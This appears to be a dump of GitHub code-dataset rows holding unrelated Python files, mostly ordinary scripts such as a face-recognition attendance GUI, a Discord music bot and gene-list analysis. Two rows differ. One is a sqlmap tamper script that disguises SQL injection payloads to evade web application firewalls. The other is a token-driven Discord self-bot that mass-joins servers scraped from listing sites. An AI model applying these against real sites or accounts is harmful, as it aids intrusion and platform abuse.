blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f731cfa199247a4181837c7dc0f6d3f01fe24c4e | 67be7acadeac8d44affc1810e68e3d83750e2d9b | /minning-util-codes/src/divide-in-intervals.py | b184aaeff840a650bd988b8dc3f628fe2dcdb3bf | [] | no_license | jordaos/text-minning | d8b869e8738513a33df942681d00abb481a7966a | c44a73f548f977ee02ab5ed3c56c7e6a86234025 | refs/heads/master | 2021-04-12T05:19:27.705194 | 2018-03-24T15:42:07 | 2018-03-24T15:42:07 | 125,797,549 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,559 | py | import sqlite3
import sys
import os
from columns import Columns
from subprocess import call, check_output
from cd import cd
PROJECT = ''
if len(sys.argv) > 1:
PROJECT = sys.argv[1]
else:
print 'Give parameter (project name)'
sys.exit()
PATH = 'DBs/' + PROJECT
DB = PATH + "/" + PROJECT + '.sqlite'
def have_twohundred_commits(sha, lastVersionHave):
with cd("projects/" + PROJECT):
call(["git", "checkout", sha])
qtdCommits = int(check_output(["ruby", "./../../src/count-commits.rb", "./../../projects/" + PROJECT]))
call(["git", "reset", "--hard", "master"])
if (((qtdCommits % 200) == 0 and qtdCommits > lastVersionHave) or (qtdCommits > lastVersionHave + 200)):
return True
return False
def save_db(n):
database = "%s/parts/%i_part/%i_part.sqlite" % (PATH, n, n)
if not os.path.exists(database):
os.makedirs(os.path.dirname(database))
f = open(database, "w+")
f.close()
call(["ruby", "src/gitlog.rb", database, "projects/" + PROJECT])
return
conn = sqlite3.connect(DB)
cursor = conn.cursor()
cursor.execute("SELECT * FROM commits;")
commits = cursor.fetchall()
i = len(commits) - 1
n = 1
lastVersionHave = 0
while i > 0:
i -= 50
while (have_twohundred_commits(commits[i][Columns.SHA.value], lastVersionHave) == False):
if i < 0:
break
print(i)
i -= 1
with cd("projects/" + PROJECT):
call(["git", "checkout", commits[i][Columns.SHA.value]])
lastVersionHave = int(check_output(["ruby", "./../../src/count-commits.rb", "./../../projects/" + PROJECT]))
save_db(n)
n += 1 | [
"jordao05@hotmail.com"
] | jordao05@hotmail.com |
50c29638c8cd749a331b847e30f6ddf9e828d468 | 7ee15347ff755880ee3fec124b7a91faf112644c | /firstpage.py | 3331ce8b58ee39f798f36ea1b28aeb6304386959 | [] | no_license | DurgaSaiSudheerGubbala/FACE-RECOGNITION-ATTENDENCE-SYSTEM | ab6a7a8380f2390399c392e2ddab6c2881450e66 | 0783027d2062edc2a01ea91aec73f313d4e39d38 | refs/heads/main | 2023-02-06T05:44:15.164210 | 2020-12-23T02:38:08 | 2020-12-23T02:38:08 | 323,781,965 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,107 | py | #import module from tkinter for UI
from tkinter import *
from playsound import playsound
import os
from datetime import datetime;
#creating instance of TK
root=Tk()
root.configure(background="white")
#root.geometry("300x300")
def function1():
os.system("py dataset_capture.py")
def function2():
os.system("py training_dataSet.py")
def function3():
os.system("py recognizer.py")
playsound('sound.mp3')
def function5():
os.startfile(os.getcwd()+"/developers/diet1frame1first.html");
def function6():
root.destroy()
def attend():
os.startfile(os.getcwd()+"/firebase/attendance_files/attendance"+str(datetime.now().date())+'.csv')
#stting title for the window
root.title("AUTOMATIC ATTENDANCE MANAGEMENT USING FACE RECOGNITION")
#creating a text label
Label(root, text="FACE RECOGNITION ATTENDANCE SYSTEM",font=("times new roman",20),fg="white",bg="maroon",height=2).grid(row=0,rowspan=2,columnspan=2,sticky=N+E+W+S,padx=5,pady=5)
#creating first button
Button(root,text="Create Dataset",font=("times new roman",20),bg="#0D47A1",fg='white',command=function1).grid(row=3,columnspan=2,sticky=W+E+N+S,padx=5,pady=5)
#creating second button
Button(root,text="Train Dataset",font=("times new roman",20),bg="#0D47A1",fg='white',command=function2).grid(row=4,columnspan=2,sticky=N+E+W+S,padx=5,pady=5)
#creating third button
Button(root,text="Recognize + Attendance",font=('times new roman',20),bg="#0D47A1",fg="white",command=function3).grid(row=5,columnspan=2,sticky=N+E+W+S,padx=5,pady=5)
#creating attendance button
Button(root,text="Attendance Sheet",font=('times new roman',20),bg="#0D47A1",fg="white",command=attend).grid(row=6,columnspan=2,sticky=N+E+W+S,padx=5,pady=5)
Button(root,text="Developers",font=('times new roman',20),bg="#0D47A1",fg="white",command=function5).grid(row=8,columnspan=2,sticky=N+E+W+S,padx=5,pady=5)
Button(root,text="Exit",font=('times new roman',20),bg="maroon",fg="white",command=function6).grid(row=9,columnspan=2,sticky=N+E+W+S,padx=5,pady=5)
root.mainloop()
| [
"noreply@github.com"
] | noreply@github.com |
6fcd77974cc305566c9496941a87ef64cb688e50 | 66fda6586a902f8043b1f5e9532699babc7b591a | /lib_openshift/models/v1_deployment_trigger_image_change_params.py | cdb5495ce392554744c8473da2b748a72362bdae | [
"Apache-2.0"
] | permissive | chouseknecht/lib_openshift | 86eff74b4659f05dfbab1f07d2d7f42b21e2252d | 02b0e4348631e088e72a982a55c214b30a4ab9d9 | refs/heads/master | 2020-12-11T05:23:17.081794 | 2016-07-28T20:15:39 | 2016-07-28T20:15:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,799 | py | # coding: utf-8
"""
OpenAPI spec version:
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pprint import pformat
from six import iteritems
import re
class V1DeploymentTriggerImageChangeParams(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
operations = [
]
def __init__(self, automatic=None, container_names=None, _from=None, last_triggered_image=None):
"""
V1DeploymentTriggerImageChangeParams - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'automatic': 'bool',
'container_names': 'list[str]',
'_from': 'V1ObjectReference',
'last_triggered_image': 'str'
}
self.attribute_map = {
'automatic': 'automatic',
'container_names': 'containerNames',
'_from': 'from',
'last_triggered_image': 'lastTriggeredImage'
}
self._automatic = automatic
self._container_names = container_names
self.__from = _from
self._last_triggered_image = last_triggered_image
@property
def automatic(self):
"""
Gets the automatic of this V1DeploymentTriggerImageChangeParams.
Automatic means that the detection of a new tag value should result in a new deployment.
:return: The automatic of this V1DeploymentTriggerImageChangeParams.
:rtype: bool
"""
return self._automatic
@automatic.setter
def automatic(self, automatic):
"""
Sets the automatic of this V1DeploymentTriggerImageChangeParams.
Automatic means that the detection of a new tag value should result in a new deployment.
:param automatic: The automatic of this V1DeploymentTriggerImageChangeParams.
:type: bool
"""
self._automatic = automatic
@property
def container_names(self):
"""
Gets the container_names of this V1DeploymentTriggerImageChangeParams.
ContainerNames is used to restrict tag updates to the specified set of container names in a pod.
:return: The container_names of this V1DeploymentTriggerImageChangeParams.
:rtype: list[str]
"""
return self._container_names
@container_names.setter
def container_names(self, container_names):
"""
Sets the container_names of this V1DeploymentTriggerImageChangeParams.
ContainerNames is used to restrict tag updates to the specified set of container names in a pod.
:param container_names: The container_names of this V1DeploymentTriggerImageChangeParams.
:type: list[str]
"""
self._container_names = container_names
@property
def _from(self):
"""
Gets the _from of this V1DeploymentTriggerImageChangeParams.
From is a reference to an image stream tag to watch for changes. From.Name is the only required subfield - if From.Namespace is blank, the namespace of the current deployment trigger will be used.
:return: The _from of this V1DeploymentTriggerImageChangeParams.
:rtype: V1ObjectReference
"""
return self.__from
@_from.setter
def _from(self, _from):
"""
Sets the _from of this V1DeploymentTriggerImageChangeParams.
From is a reference to an image stream tag to watch for changes. From.Name is the only required subfield - if From.Namespace is blank, the namespace of the current deployment trigger will be used.
:param _from: The _from of this V1DeploymentTriggerImageChangeParams.
:type: V1ObjectReference
"""
self.__from = _from
@property
def last_triggered_image(self):
"""
Gets the last_triggered_image of this V1DeploymentTriggerImageChangeParams.
LastTriggeredImage is the last image to be triggered.
:return: The last_triggered_image of this V1DeploymentTriggerImageChangeParams.
:rtype: str
"""
return self._last_triggered_image
@last_triggered_image.setter
def last_triggered_image(self, last_triggered_image):
"""
Sets the last_triggered_image of this V1DeploymentTriggerImageChangeParams.
LastTriggeredImage is the last image to be triggered.
:param last_triggered_image: The last_triggered_image of this V1DeploymentTriggerImageChangeParams.
:type: str
"""
self._last_triggered_image = last_triggered_image
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| [
"jdetiber@redhat.com"
] | jdetiber@redhat.com |
2efe378579a32f494f6942fa0ac13a700a233957 | cffee94b843fff699f68eaae972ed829858fbb0d | /typings/mediafile/mutagen/mp3/__init__.pyi | da26b2285df4dd3b5373082919fadc979a486824 | [
"MIT"
] | permissive | Josef-Friedrich/phrydy | 3b5fae00d3d7210821dc9037d00f9432e1df3c2d | c6e17e8b9e24678ec7672bff031d0370bfa8b6f8 | refs/heads/main | 2023-08-25T12:11:47.333984 | 2023-08-08T14:50:08 | 2023-08-08T14:50:08 | 66,490,323 | 6 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,255 | pyi | """
This type stub file was generated by pyright.
"""
from __future__ import division
from functools import partial
from io import BytesIO
from mutagen._util import BitReader, cdata, iterbytes
"""
http://www.codeproject.com/Articles/8295/MPEG-Audio-Frame-Header
http://wiki.hydrogenaud.io/index.php?title=MP3
"""
class LAMEError(Exception): ...
class LAMEHeader:
"""http://gabriel.mp3-tech.org/mp3infotag.html"""
vbr_method = ...
lowpass_filter = ...
quality = ...
vbr_quality = ...
track_peak = ...
track_gain_origin = ...
track_gain_adjustment = ...
album_gain_origin = ...
album_gain_adjustment = ...
encoding_flags = ...
ath_type = ...
bitrate = ...
encoder_delay_start = ...
encoder_padding_end = ...
source_sample_frequency_enum = ...
unwise_setting_used = ...
stereo_mode = ...
noise_shaping = ...
mp3_gain = ...
surround_info = ...
preset_used = ...
music_length = ...
music_crc = ...
header_crc = ...
def __init__(self, xing, fileobj) -> None:
"""Raises LAMEError if parsing fails"""
...
def guess_settings(self, major, minor):
"""Gives a guess about the encoder settings used. Returns an empty
string if unknown.
The guess is mostly correct in case the file was encoded with
the default options (-V --preset --alt-preset --abr -b etc) and no
other fancy options.
Args:
major (int)
minor (int)
Returns:
text
"""
...
@classmethod
def parse_version(cls, fileobj):
"""Returns a version string and True if a LAMEHeader follows.
The passed file object will be positioned right before the
lame header if True.
Raises LAMEError if there is no lame version info.
"""
...
class XingHeaderError(Exception): ...
class XingHeaderFlags:
FRAMES = ...
BYTES = ...
TOC = ...
VBR_SCALE = ...
class XingHeader:
frames = ...
bytes = ...
toc = ...
vbr_scale = ...
lame_header = ...
lame_version = ...
lame_version_desc = ...
is_info = ...
def __init__(self, fileobj) -> None:
"""Parses the Xing header or raises XingHeaderError.
The file position after this returns is undefined.
"""
...
def get_encoder_settings(self): # -> Literal['']:
"""Returns the guessed encoder settings"""
...
@classmethod
def get_offset(cls, info): # -> Literal[36, 21, 13]:
"""Calculate the offset to the Xing header from the start of the
MPEG header including sync based on the MPEG header's content.
"""
...
class VBRIHeaderError(Exception): ...
class VBRIHeader:
version = ...
quality = ...
bytes = ...
frames = ...
toc_scale_factor = ...
toc_frames = ...
toc = ...
def __init__(self, fileobj) -> None:
"""Reads the VBRI header or raises VBRIHeaderError.
The file position is undefined after this returns
"""
...
@classmethod
def get_offset(cls, info): # -> Literal[36]:
"""Offset in bytes from the start of the MPEG header including sync"""
...
| [
"josef@friedrich.rocks"
] | josef@friedrich.rocks |
937206a203bb423de0c7d72e23c6038ff821b56e | 33491a09da629999c84f11ed10543cb6de425221 | /final.py | bdfccf9101ffdfa2176e9668abeb5dba728fef2d | [] | no_license | lebomashatola/CS50W | e4559ec1894fadaaa8a2fe88c3ec693e7437f2c2 | 7abbcb3243c5e3227879c993b993cda271c724db | refs/heads/master | 2020-04-14T16:37:31.262458 | 2019-02-12T10:19:55 | 2019-02-12T10:19:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,107 | py | import pandas as pd
import numpy as np
#Creates new sig dataset with gene name added
class read_csv:
def __init__(self, sig, names):
self.sig = sig
self.gene_names = names
def out_csv(self):
print(self.sig.columns)
self.sig = self.sig.drop([' Gene Name'], axis=1)
sig_genes = pd.concat([self.gene_names, self.sig], axis=1, join='inner')
sig_genes = sig_genes.drop_duplicates(subset='Gene Name')
return sig_genes
#upregulated genes
class up_regulated:
def __init__(self, up_reg):
self.up_reg = up_reg
self.sig = sig
def up_regulated(self):
up_reg_genes = pd.read_csv('up.csv')
read_in = read_csv()
new = read_in.out_csv()
up_regulate = self.sig.loc[self.sig['Probe Set Name'].
isin(self.up_reg['Gene Name'])]
up_reg_genes = up_regulate.sort_values(by=' Fold Change (log2)',
ascending=False)
up_regulate.to_csv('up_reg.csv ', index=False)
up_list = up_reg_genes['Gene Name']
up_list = up_list.to_csv('up_lst.csv', index=False, header=True)
return up_reg_genes
#down regulated genes
class down_regulated:
def __init__(self):
self.down_reg = pd.read_csv('down.csv')
def down_regulated(self):
self.down_reg = self.down_reg['Gene Name'].tolist()
read_in = read_csv()
new = read_in.out_csv()
down_regulate = new.loc[new['Probe Set Name'].isin(self.down_reg)]
down_regulate = down_regulate.drop_duplicates(subset="Gene Name")
down_regulated = down_regulate.sort_values(by=' Fold Change (log2)',
ascending=True)
down_regulate.to_csv('down_reg.csv', index=False)
down_list = down_regulated['Gene Name']
down_list = down_list.to_csv('down_lst.csv', index=False,
header='Gene Name')
return down_regulated
#searching through resistant genes
class resistant_genes:
def __init__(self):
self.resis = pd.read_csv('resistant_genes.tsv', sep='\t')
self.resis2 = pd.read_excel('resis_genes_2.xlsx')
def search_genes(self):
res = self.resis['search_term']
res.sort_values(ascending=True)
resis_gene = res.to_csv('resistant_genes.csv', index=False,
header=['Gene Name'])
res_genes = pd.read_csv('resistant_genes.csv')
res_genes = res_genes.drop_duplicates()
res_genes.to_csv('resistant_genes.csv', index=False)
new = pd.read_csv('up_reg.csv')
resis_genes = new.loc[new['Gene Name'].isin(res_genes['Gene Name'])]
resis_genes2 = new.loc[new['Gene Name'].isin(self.resis2['Gene'])]
resis_genes_final = pd.concat([resis_genes, resis_genes2],
ignore_index=True)
resis_genes_final = resis_genes_final.drop_duplicates()
list = resis_genes_final['Gene Name']
list.to_csv('resistant_genes.csv', index=False, header=['Gene Name'])
up_regulate = resis_genes_final.sort_values(by=' Fold Change (log2)',
ascending=False)
resis_genes_final.to_csv('resistant_gene_list.csv', index=False)
return resis_genes_final
#searching up regulated genes
class gene_search:
def __init__(self):
self.genes = pd.read_csv('up_lst.csv')
self.search = list(map(str,
input('Enter Genes to search: ').upper().split()))
def search_into(self):
for gene in self.search:
a = gene in self.genes.values
if a is True:
print(gene, 'present')
else:
print(gene, 'absent')
if __name__ == '__main__':
a = read_csv()
a.out_csv()
b = up_regulated()
b.up_regulated()
c = down_regulated()
c.down_regulated()
d = resistant_genes()
d.search_genes()
e = gene_search()
e.search_into()
| [
"lm@Lebos-MacBook-Air.local"
] | lm@Lebos-MacBook-Air.local |
be29ecfaa46d89bbd1ee4b1db0e5d9408aabbcd4 | e9fead57eac4217ab9be524acdaedbb5d850fd57 | /main.py | 992c758c3ab6078ad5623aa6b2f413081355d222 | [] | no_license | DAMIOSKIDEV/GiveawayNitroJoiner | e9d2587e2867d4bedd0df44f2e7bea0b83067dac | 6d706126808a5cc72c6fe24da9025f1f439a32c1 | refs/heads/master | 2022-12-07T05:19:07.201818 | 2020-03-26T04:47:45 | 2020-03-26T04:47:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,704 | py | import requests, re, time, random
from colorama import init, Fore
init(convert=True)
def start():
urls = ["https://discordservers.me/servers/search?term=Nitro&page=", "https://discordservers.me/servers/search?term=Giveaway&page="]
numb = 1
session = requests.Session()
print(f"[{Fore.CYAN}>{Fore.RESET}] Input Discord Token")
token = input(" > ")
session.put(f"https://discordapp.com/api/v6/users/@me/connections/skype/{random.randint(1, 10)}", json={ "name": 'icewallowcum,"visibility": 1, "verified": True },headers={"Authorization": token})
while True:
if numb < 100:
for url in urls:
response = session.get(url + str(numb))
if response.status_code != 404:
regex = re.search("https(:)\/\/discord.gg\/[a-zA-Z0-9]+", response.text)
if regex:
code = str(regex.group()).split("/")[3]
headers = {
"Authorization": token
}
inviteResp = session.post(f"https://discordapp.com/api/v6/invites/{code}", headers=headers).json()
try:
if inviteResp["guild"]["name"]:
print(f"[{Fore.CYAN}Success{Fore.RESET}] Joined the server: {inviteResp['guild']['name']}")
except:
pass
else:
pass
elif response.status_code == 404:
break
else:
break
numb+=1
input("")
if __name__ == "__main__":
start()
| [
"noreply@github.com"
] | noreply@github.com |
f9242da26ab0e85261149acc3935789753a44160 | 0cafca9e27e70aa47b3774a13a537f45410f13f7 | /idb/ipc/push.py | c7f6d1ab8f6e77317e6d081e0655d31ebf0c16a5 | [
"MIT"
] | permissive | fakeNetflix/facebook-repo-idb | 18b67ca6cfa0edd3fa7b9c4940fec6c3f0ccfa73 | eb4ed5a7dc4a14b224a22e833294d7366fe4725e | refs/heads/master | 2023-01-05T13:19:40.755318 | 2019-08-16T15:23:45 | 2019-08-16T15:25:00 | 203,098,477 | 1 | 0 | MIT | 2023-01-04T07:33:09 | 2019-08-19T04:31:16 | Objective-C | UTF-8 | Python | false | false | 1,039 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
from idb.common.stream import stream_map
from idb.common.tar import generate_tar
from idb.grpc.idb_pb2 import Payload, PushRequest, PushResponse
from idb.grpc.stream import Stream, drain_to_stream
from idb.grpc.types import CompanionClient
async def daemon(
client: CompanionClient, stream: Stream[PushResponse, PushRequest]
) -> None:
async with client.stub.push.open() as companion:
await companion.send_message(await stream.recv_message())
if client.is_local:
generator = stream
else:
paths = [request.payload.file_path async for request in stream]
generator = stream_map(
generate_tar(paths=paths),
lambda chunk: PushRequest(payload=Payload(data=chunk)),
)
response = await drain_to_stream(
stream=companion, generator=generator, logger=client.logger
)
await stream.send_message(response)
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
181269644d8602fc2dcb673b30857f2da8b2b11f | 6deafbf6257a5c30f084c3678712235c2c31a686 | /Toolz/sqlmap/tamper/least.py | 53a8a6aadefe283a268fd3ad7a0c5fd1f51f2a67 | [
"Unlicense",
"LicenseRef-scancode-generic-cla",
"GPL-1.0-or-later",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-proprietary-license",
"GPL-2.0-only",
"LicenseRef-scancode-commercial-license",
"LicenseRef-scancode-other-permissive"
] | permissive | thezakman/CTF-Heaven | 53fcb4a72afa821ad05d8cc3b309fb388f958163 | 4b52a2178922f1502ab00fa8fc156d35e1dc653f | refs/heads/master | 2023-04-05T18:20:54.680378 | 2023-03-21T13:47:45 | 2023-03-21T13:47:45 | 167,290,879 | 182 | 24 | Unlicense | 2022-11-29T21:41:30 | 2019-01-24T02:44:24 | Python | UTF-8 | Python | false | false | 1,126 | py | #!/usr/bin/env python
"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGHEST
def dependencies():
pass
def tamper(payload, **kwargs):
"""
Replaces greater than operator ('>') with 'LEAST' counterpart
Tested against:
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass weak and bespoke web application firewalls that
filter the greater than character
* The LEAST clause is a widespread SQL command. Hence, this
tamper script should work against majority of databases
>>> tamper('1 AND A > B')
'1 AND LEAST(A,B+1)=B+1'
"""
retVal = payload
if payload:
match = re.search(r"(?i)(\b(AND|OR)\b\s+)([^>]+?)\s*>\s*(\w+|'[^']+')", payload)
if match:
_ = "%sLEAST(%s,%s+1)=%s+1" % (match.group(1), match.group(3), match.group(4), match.group(4))
retVal = retVal.replace(match.group(0), _)
return retVal
| [
"thezakman@ctf-br.org"
] | thezakman@ctf-br.org |
31d7c339cd134320969c186fadcd97cfb4c7b15e | 0a830ace2253924ca216f1bcca5a61327a710d78 | /MainWebApp/urls.py | 7b329d32f937967400a6f7cb69c1386abcedafd5 | [] | no_license | AyushSolanki-17/HealthGaurd-Server | 39f0161e54f3a70d2014aafc723a6a52217277d3 | 64661afecbd226c0962ff7181c6038690b2fb0b6 | refs/heads/main | 2023-05-04T10:14:17.024867 | 2021-05-25T13:59:26 | 2021-05-25T13:59:26 | 370,714,847 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 144 | py | from django.urls import path
from . import views
app_name = 'MainWebApp'
urlpatterns = [
path('', views.HomeView.as_view(), name='home')
]
| [
"ayush17solanki@gmail.com"
] | ayush17solanki@gmail.com |
a1c79de8e2240910b9f6374bba5cfb966fee8daf | f2e97531cb0e01a8cfc636eda7d3e56873c33af7 | /python/Alura/data science/numpy/atr_metodos.py | e64426b2ad71b0cfe57ee5cf36136f770de6562c | [
"MIT"
] | permissive | alifoliveira/rep-estudos | c0c13153ff0728090ffa2102d159dbff2e750444 | 73ffb7cfe77890f6cca8b5447db332f88454ef7e | refs/heads/master | 2023-01-05T11:57:29.335267 | 2020-11-04T01:54:08 | 2020-11-04T01:54:08 | 278,215,034 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,202 | py | import numpy as np
dados = np.array([[44410., 5712., 37123., 0., 25757.],
[2003, 1991, 1990, 2019, 1006]])
cont = np.arange(10)
print(dados.shape) # retorna quantidade de linhas e colunas
print(dados.ndim) # retorna a quantidade de dimnensões do array
print(dados.size) # retorna o numeros de elementos do array
print(dados.dtype) # retorna o tipo de dados do array
print(dados.T) # retorna o array transposto, coverte linhas em colunas e vice versa
print(dados.transpose) # mesma função do array.T
print(dados.tolist) # converte o array para lista do python
print(cont.reshape((5, 2), order='C')) # retorna array contendo uma nova forma, order='C', order='F
km = [44410, 5712, 37123, 0, 25757]
anos = [2003, 1991, 1990, 2019, 2006]
info_carros = km + anos # concatenação das listas
print(info_carros)
print(np.array(info_carros).reshape((5, 2), order='F')) # concatenação com reshape
dados_new = dados.copy() # cria uma cópia do array
dados_new.resize((3, 5), refcheck=False) # adiciona mais uma linha(ou coluna) no array | refcheck ignora referencia
print(dados_new)
dados_new[2] = dados_new[0] / (2019 - dados_new[1])
| [
"53924906+alifoliveira@users.noreply.github.com"
] | 53924906+alifoliveira@users.noreply.github.com |
224712607926f64e14c27334b837bc69b83fd5f4 | 54e6f5ef63d9d48af97321c2cc1fe83e4315de65 | /rkcodingmusic.py | 6639fc9c28e166a6c44c51aadeec4fe8b54e02f8 | [] | no_license | Harsishest/Videos | 70de7947a1b259bbafef7019645eedbe01014093 | 7556839ecf9c1781a7bae899affdcf4461337e26 | refs/heads/master | 2023-04-24T19:12:47.332613 | 2021-04-29T13:56:36 | 2021-04-29T13:56:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,170 | py | import discord
from discord.ext import commands, tasks
from discord.voice_client import VoiceClient
import youtube_dl
from random import choice
youtube_dl.utils.bug_reports_message = lambda: ''
ytdl_format_options = {
'format': 'bestaudio/best',
'outtmpl': '%(extractor)s-%(id)s-%(title)s.%(ext)s',
'restrictfilenames': True,
'noplaylist': True,
'nocheckcertificate': True,
'ignoreerrors': False,
'logtostderr': False,
'quiet': True,
'no_warnings': True,
'default_search': 'auto',
'source_address': '0.0.0.0' # bind to ipv4 since ipv6 addresses cause issues sometimes
}
ffmpeg_options = {
'options': '-vn'
}
ytdl = youtube_dl.YoutubeDL(ytdl_format_options)
class YTDLSource(discord.PCMVolumeTransformer):
def __init__(self, source, *, data, volume=0.5):
super().__init__(source, volume)
self.data = data
self.title = data.get('title')
self.url = data.get('url')
@classmethod
async def from_url(cls, url, *, loop=None, stream=False):
loop = loop or asyncio.get_event_loop()
data = await loop.run_in_executor(None, lambda: ytdl.extract_info(url, download=not stream))
if 'entries' in data:
# take first item from a playlist
data = data['entries'][0]
filename = data['url'] if stream else ytdl.prepare_filename(data)
return cls(discord.FFmpegPCMAudio(filename, **ffmpeg_options), data=data)
client = commands.Bot(command_prefix='?')
status = ['Jamming out to music!', 'Eating!', 'Sleeping!']
@client.event
async def on_ready():
change_status.start()
print('Bot is online!')
@client.event
async def on_member_join(member):
channel = discord.utils.get(member.guild.channels, name='general')
await channel.send(f'Welcome {member.mention}! Ready to jam out? See `?help` command for details!')
@client.command(name='ping', help='This command returns the latency')
async def ping(ctx):
await ctx.send(f'**Pong!** Latency: {round(client.latency * 1000)}ms')
@client.command(name='hello', help='This command returns a random welcome message')
async def hello(ctx):
responses = ['***grumble*** Why did you wake me up?', 'Top of the morning to you lad!', 'Hello, how are you?', 'Hi', '**Wasssuup!**']
await ctx.send(choice(responses))
@client.command(name='die', help='This command returns a random last words')
async def die(ctx):
responses = ['why have you brought my short life to an end', 'i could have done so much more', 'i have a family, kill them instead']
await ctx.send(choice(responses))
@client.command(name='credits', help='This command returns the credits')
async def credits(ctx):
await ctx.send('Made by `RK Coding`')
await ctx.send('Thanks to `DiamondSlasher` for coming up with the idea')
await ctx.send('Thanks to `KingSticky` for helping with the `?die` and `?creditz` command')
@client.command(name='creditz', help='This command returns the TRUE credits')
async def creditz(ctx):
await ctx.send('**No one but me, lozer!**')
@client.command(name='play', help='This command plays music')
async def play(ctx, url):
if not ctx.message.author.voice:
await ctx.send("You are not connected to a voice channel")
return
else:
channel = ctx.message.author.voice.channel
await channel.connect()
server = ctx.message.guild
voice_channel = server.voice_client
async with ctx.typing():
player = await YTDLSource.from_url(url, loop=client.loop)
voice_channel.play(player, after=lambda e: print('Player error: %s' % e) if e else None)
await ctx.send('**Now playing:** {}'.format(player.title))
@client.command(name='stop', help='This command stops the music and makes the bot leave the voice channel')
async def stop(ctx):
voice_client = ctx.message.guild.voice_client
await voice_client.disconnect()
@tasks.loop(seconds=20)
async def change_status():
await client.change_presence(activity=discord.Game(choice(status)))
client.run('token')
| [
"noreply@github.com"
] | noreply@github.com |
f41c2cc05cab603afafc3e2f134cee4a96198d8c | eae037ea71a2dfb9830c2a8fd3b28fdf4e9048a3 | /code/chapter-1/create.py | b6e73c092e94ca0654c8d83d753bcbd4ab18fe98 | [
"MIT"
] | permissive | StevenYuysy/fullstack-in-python | 040c17ed93b8807fa5c4f0c5ebc34ef79678e0e9 | 688badd91d212298a49ec0d08c9cc456ccb16984 | refs/heads/master | 2021-01-20T20:36:54.835161 | 2016-07-31T15:07:12 | 2016-07-31T15:07:12 | 62,937,266 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 375 | py | from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from database_setup import Base, Restaurant, MenuItem
engine = create_engine('sqlite:///restaurantmenu.db')
Base.metadata.bind = engine
DBSession = sessionmaker(bind = engine)
session = DBSession()
myFirstRestaurant = Restaurant(name='Pizza Hut')
session.add(myFirstRestaurant)
session.commit()
| [
"stevenyuysy@gmail.com"
] | stevenyuysy@gmail.com |
43d3b82f26767f992d2dca75556788abb438e7d5 | 7055607e2407e4adbad1bf888324e9b406f11092 | /FolderingFolderServer/migrations/0010_auto_20190524_1424.py | 899d0185f5108e273b3df2035b8a0154f6f199d7 | [] | no_license | wldnjszz1/foldering-backend | 3c3f6b933cb9fa6c41f467e4cf162377d40f846a | 2dd215c597cf4f55d36677cebeb035212e988c2b | refs/heads/master | 2020-05-05T06:56:54.850948 | 2019-05-25T03:36:24 | 2019-05-25T03:36:24 | 179,807,347 | 1 | 0 | null | 2019-04-06T08:24:45 | 2019-04-06T08:24:45 | null | UTF-8 | Python | false | false | 1,017 | py | # Generated by Django 2.2 on 2019-05-24 05:24
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('FolderingFolderServer', '0009_folder_author'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
